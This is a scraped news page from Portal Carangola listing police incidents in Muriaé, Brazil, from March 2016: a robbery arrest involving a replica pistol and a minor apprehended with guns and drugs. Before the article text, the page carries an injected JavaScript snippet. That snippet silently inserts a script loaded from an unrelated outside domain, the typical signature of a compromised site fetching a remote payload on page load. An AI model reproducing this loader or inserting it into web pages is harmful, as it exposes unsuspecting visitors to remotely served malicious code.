;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais 14 de março de 2016. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais 14 de março de 2016.

pmmgesOCORRÊNCIAS DE DESTAQUE MURIAÉ – 11/03/2016

76ª CIA PM – MURIAÉ

PM PRENDE AUTOR DE ROUBO E APREENDE ARMA DE FOGO EM MURIAÉ

Em 12/03/2016, por volta das 09h45min, na Rua Cel Marciano Rodrigues, no centro da cidade, militares compareceram em um estabelecimento comercial, onde a vítima D.R.L., de 22 anos, relatou que o autor chegou ao local e de posse de uma arma de fogo, roubou seu celular e evadiu. Durante rastreamento pelas imediações, os militares localizaram e abordaram o autor T.F.S., de 18 anos, o qual já estava sem o aparelho roubado e sem a arma utilizada para a prática do delito, porém confessou ter passado o celular para R.T.S.O., de 33 anos, o qual alegou que compraria o referido aparelho pela quantia de R$ 60,00. A testemunha Z.W., de 28 anos, entregou a arma utilizada, relatando que o autor teria lhe pedido para guardá-la, tratando-se de um simulacro de pistola. O autor foi preso pelo roubo, bem como o receptador do aparelho celular, sendo conduzidos para a Delegacia de Polícia.

PM APREENDE MENOR E MATERIAIS RELACIONADOS AO TRÁFICO DE DROGAS EM MURIAÉ

Em 13/03/2016, por volta das 02h00min, na Rua da Educação, no Bairro São Joaquim, após denúncias de que M.A.N.B., de 16 anos, estaria ameaçando moradores e efetuando disparos em via pública, militares monitoraram o autor, que ao avistar as viaturas, evadiu. Após algumas horas, os militares diligenciaram novamente até o bairro e na residência do tio do autor, o localizaram deitado em um sofá e ao seu lado, 01 garrucha cal. 22 com 01 munição intacta. Durante parlamentação, o menor infrator confessou ter enterrado outra arma e drogas em um pasto, momento em que os militares realizaram buscas e localizaram dentro de um cano de pvc, 01 revólver cal.32 com 03 munições intactas, 01 pedra grande de crack e 01 balança de precisão. Diante dos fatos, o menor foi apreendido juntamente com o material e conduzido para a Delegacia de Polícia.

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.